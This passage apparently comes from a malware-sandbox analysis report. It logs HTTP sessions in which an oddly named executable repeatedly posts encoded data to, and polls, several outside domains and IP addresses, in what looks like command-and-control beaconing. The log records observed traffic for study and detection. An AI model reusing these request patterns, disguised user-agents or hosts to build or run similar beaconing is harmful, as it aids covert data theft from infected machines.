18 | 192.168.2.22 | 49183 | 46.30.211.38 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:58.439832926 CET | 2472 | OUT | POST /an5q/ HTTP/1.1
    Host: www.bankseedz.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.bankseedz.info
    Referer: http://www.bankseedz.info/an5q/
    Content-Length: 2159
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                           Dec 12, 2024 10:21:59.691046000 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:21:59 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           19 | 192.168.2.22 | 49184 | 46.30.211.38 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Dec 12, 2024 10:22:01.103338957 CET | 811 | OUT | POST /an5q/ HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.bankseedz.info
                                                                                                            Referer: http://www.bankseedz.info/an5q/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                           Dec 12, 2024 10:22:02.353169918 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:02 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           20 | 192.168.2.22 | 49185 | 46.30.211.38 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Dec 12, 2024 10:22:03.755090952 CET | 2472 | OUT | POST /an5q/ HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.bankseedz.info
                                                                                                            Referer: http://www.bankseedz.info/an5q/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                           Dec 12, 2024 10:22:03.875967979 CET | 1764 | OUT
                                                                                                           Dec 12, 2024 10:22:05.011869907 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:04 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           21 | 192.168.2.22 | 49186 | 46.30.211.38 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Dec 12, 2024 10:22:06.398662090 CET | 543 | OUT | GET /an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                           Dec 12, 2024 10:22:07.653134108 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           22 | 192.168.2.22 | 49187 | 77.68.64.45 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Dec 12, 2024 10:22:13.041235924 CET | 2472 | OUT | POST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                           Dec 12, 2024 10:22:13.161119938 CET | 309 | OUT
                                                                                                           Dec 12, 2024 10:22:14.262713909 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:14 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           23 | 192.168.2.22 | 49188 | 77.68.64.45 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Dec 12, 2024 10:22:15.706136942 CET | 820 | OUT | POST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:16.929047108 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:16 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            24 | 192.168.2.22 | 49189 | 77.68.64.45 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:18.387567043 CET | 2472 | OUT | POST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:18.506958961 CET | 1773 | OUT |
                                                                                                            Dec 12, 2024 10:22:19.610274076 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:19 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            25 | 192.168.2.22 | 49190 | 77.68.64.45 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:21.035830021 CET | 546 | OUT | GET /ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:22.262573004 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:22 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            26 | 192.168.2.22 | 49191 | 146.88.233.115 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:27.803133011 CET | 2472 | OUT | POST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:27.923190117 CET | 309 | OUT |
                                                                                                            Dec 12, 2024 10:22:29.374142885 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:29 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            27 | 192.168.2.22 | 49192 | 146.88.233.115 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:30.461694002 CET | 820 | OUT | POST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:31.731724024 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:31 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            28 | 192.168.2.22 | 49193 | 146.88.233.115 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:33.121078968 CET | 2472 | OUT | POST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:33.240523100 CET | 1773 | OUT |
                                                                                                            Dec 12, 2024 10:22:34.499677896 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:34 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            29 | 192.168.2.22 | 49194 | 146.88.233.115 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:35.774292946 CET | 546 | OUT | GET /m1g9/?x4=Cu+laRdL4iPyeXPOvnXbHATCRLbFtZvgmbFpChU/EeiHg3j+sEFT+StkZuqTMzkW17xuxTA+IyjM3SxoNr0bNIrAJ4iZv6YB/kmuH0GNS74UnHLgt4utBlkurB62&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:22:37.055391073 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:36 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.22 | 49195 | 217.160.0.200 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:22:42.837428093 CET | 2472 | OUT | POST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:22:42.957237959 CET | 300 | OUT
Dec 12, 2024 10:22:44.106810093 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:43 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
Dec 12, 2024 10:22:44.106861115 CET | 899 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.22 | 49196 | 217.160.0.200 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:22:45.507126093 CET | 811 | OUT | POST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Ascii: x4=i1/Jbp3LmLCJ87GD1LCCoRF2XCe7IvwIXZ/Oy04bjlOahqizcBWGuzyuGbEo3kepdXVUJ2ttaVj7NGjwPL7T6Cud3z5qRtAnGyTfwL7HusAGJGFkmYZ4V9bzNLCS5GjZCYl9Ubk24GVpcRB4RwVpD0+/Q/YNRmaRJcGlD58rNSBVKxpkPyRlgRdpyfIlM+c2Ng==
Dec 12, 2024 10:22:46.771797895 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:46 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
Dec 12, 2024 10:22:46.771863937 CET | 899 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.22 | 49197 | 217.160.0.200 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:22:48.203142881 CET | 2472 | OUT | POST /8mom/ HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.carsten.studio
                                                                                                            Referer: http://www.carsten.studio/8mom/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:22:48.326210022 CET | 1764 | OUT
Dec 12, 2024 10:22:49.573703051 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:49 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
Dec 12, 2024 10:22:49.573735952 CET | 899 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.22 | 49198 | 217.160.0.200 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:22:50.898576021 CET | 543 | OUT | GET /8mom/?e2E=wRQ8oHXx&x4=v3XpYZPN786X74upleiKtnNLTnr+c+QwOZfu2m4ZpmP7p96MXgDDhh7sLakM2W7qG0VyTnNwFXquJXbjGrCq/za7/jRofJkRFgfW/Ij12v4wAiV6r71IBPX8JcSc HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:22:52.139718056 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 4545
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:51 GMT
                                                                                                            Server: Apache
                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
